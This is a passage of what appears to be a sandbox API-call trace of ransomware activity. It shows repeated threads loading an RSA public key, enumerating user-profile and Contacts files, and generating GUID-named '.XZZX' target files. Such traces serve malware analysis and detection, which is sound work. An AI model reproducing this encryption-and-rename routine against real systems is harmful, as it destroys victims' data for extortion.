f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.654] lstrcpyW (in: lpString1=0x29af460, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0161.654] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.654] SetErrorMode (uMode=0x1) returned 0x1 [0161.654] lstrcpyW (in: lpString1=0x29af860, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0161.654] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x389a783f, Data2=0x1166, Data3=0x4448, Data4=([0]=0x83, [1]=0x4, [2]=0x40, [3]=0x24, [4]=0x12, [5]=0xab, [6]=0x7f, [7]=0xbd))) returned 0x0 [0161.654] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0161.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.654] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\CF88181A04A3FCB0389A783F073EE0F8.XZZX") returned 71 [0161.654] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="XZZX") returned 0x0 [0161.654] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", dwFileAttributes=0x20) returned 1 [0161.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 537 os_tid = 0xbd0 [0161.810] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.810] lstrcpyW (in: lpString1=0x29af460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0161.810] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.810] SetErrorMode (uMode=0x1) returned 0x1 [0161.810] lstrcpyW (in: lpString1=0x29af860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0161.810] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xdf2b19da, Data2=0xd678, Data3=0x44d5, Data4=([0]=0x94, [1]=0xbb, [2]=0x84, [3]=0x3c, [4]=0xf, [5]=0xe, [6]=0xe6, [7]=0x10))) returned 0x0 [0161.810] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0161.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.810] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\A3D05A3039AA51D8DF2B19DA3C453620.XZZX") returned 71 [0161.810] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="XZZX") returned 0x0 [0161.810] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", dwFileAttributes=0x20) returned 1 [0161.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 538 os_tid = 0xbd4 [0161.966] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0161.966] lstrcpyW (in: lpString1=0x29af460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0161.966] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0161.966] SetErrorMode (uMode=0x1) returned 0x1 [0161.966] lstrcpyW (in: lpString1=0x29af860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0161.966] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0xce7715f9, Data2=0xabee, Data3=0x4441, Data4=([0]=0xb3, [1]=0x54, [2]=0xd7, [3]=0x41, [4]=0x83, [5]=0xbb, [6]=0x41, [7]=0x6a))) returned 0x0 [0161.966] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0161.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0161.966] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\7E63C07E2DD6DF6ECE7715F93071C3B6.XZZX") returned 71 [0161.966] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0161.966] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 1 [0161.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 539 os_tid = 0xbd8 [0162.122] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.122] lstrcpyW (in: lpString1=0x29af460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0162.122] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0162.122] SetErrorMode (uMode=0x1) returned 0x1 [0162.122] lstrcpyW (in: lpString1=0x29af860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0162.122] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x21c68620, Data2=0x4a6c, Data3=0x44bb, Data4=([0]=0x9a, [1]=0xd0, [2]=0x4f, [3]=0x61, [4]=0xfd, [5]=0x86, [6]=0x4d, [7]=0xed))) returned 0x0 [0162.122] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0162.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0162.125] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\A285D58013FB0CE421C686201695F12C.XZZX") returned 71 [0162.125] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0162.125] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 1 [0162.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 540 os_tid = 0xbdc [0162.287] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.287] lstrcpyW (in: lpString1=0x29af460, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0162.287] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.287] SetErrorMode (uMode=0x1) returned 0x1 [0162.287] lstrcpyW (in: lpString1=0x29af860, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0162.287] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x34f4a4f0, Data2=0xa42d, Data3=0x43bd, Data4=([0]=0xbb, [1]=0xd, [2]=0x8, [3]=0x1e, [4]=0x28, [5]=0xa9, [6]=0x61, [7]=0xee))) returned 0x0 [0162.287] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\278D60903B72BF40F401616C3FAFA388.XZZX") returned 80 [0162.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0162.287] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\08AABE302B70FC3934F4A4F02E0BE081.XZZX") returned 80 [0162.287] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 541 os_tid = 0xbe0 [0162.434] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.434] lstrcpyW (in: lpString1=0x29af460, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0162.434] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.434] SetErrorMode (uMode=0x1) returned 0x1 [0162.434] lstrcpyW (in: lpString1=0x29af860, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0162.434] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x3c9aed60, Data2=0x1016, Data3=0x4be6, Data4=([0]=0x96, [1]=0x6d, [2]=0x85, [3]=0x60, [4]=0x8f, [5]=0x2a, [6]=0xa3, [7]=0x5b))) returned 0x0 [0162.434] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\3180D48C036A6FAAA02E258A076353F2.XZZX") returned 80 [0162.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0162.434] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\E426664004C4E5C43C9AED60075FCA0C.XZZX") returned 80 [0162.434] StrStrW (lpFirst="3180D48C036A6FAAA02E258A076353F2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 542 os_tid = 0xbe4 [0162.590] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.590] lstrcpyW (in: lpString1=0x29af460, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0162.590] lstrcpyW (in: lpString1=0x29ae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0162.590] SetErrorMode (uMode=0x1) returned 0x1 [0162.590] lstrcpyW (in: lpString1=0x29af860, lpString2="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" | out: lpString1="4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned="4C9E88000CB6CC7042EF328010E3B0B8.XZZX" [0162.590] CoCreateGuid (in: pguid=0x29ae440 | out: pguid=0x29ae440*(Data1=0x8cb33d0, Data2=0x9ab2, Data3=0x47b3, Data4=([0]=0x8c, [1]=0x12, [2]=0x1f, [3]=0xc8, [4]=0x66, [5]=0x21, [6]=0x98, [7]=0x20))) returned 0x0 [0162.590] wsprintfW (in: param_1=0x29aec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\4C9E88000CB6CC7042EF328010E3B0B8.XZZX") returned 80 [0162.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x29afee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0162.590] wsprintfW (in: param_1=0x29ae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\5A7526A02B53887608CB33D02DEE6CBE.XZZX") returned 80 [0162.590] StrStrW (lpFirst="4C9E88000CB6CC7042EF328010E3B0B8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 543 os_tid = 0xbe8 [0162.746] lstrcpyA (in: lpString1=0x29afc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0162.746] lstrcpyW (in: lpString1=0x29af460, lpString2="63AB35AD17277526536F22E31B54596E.XZZX" | out: 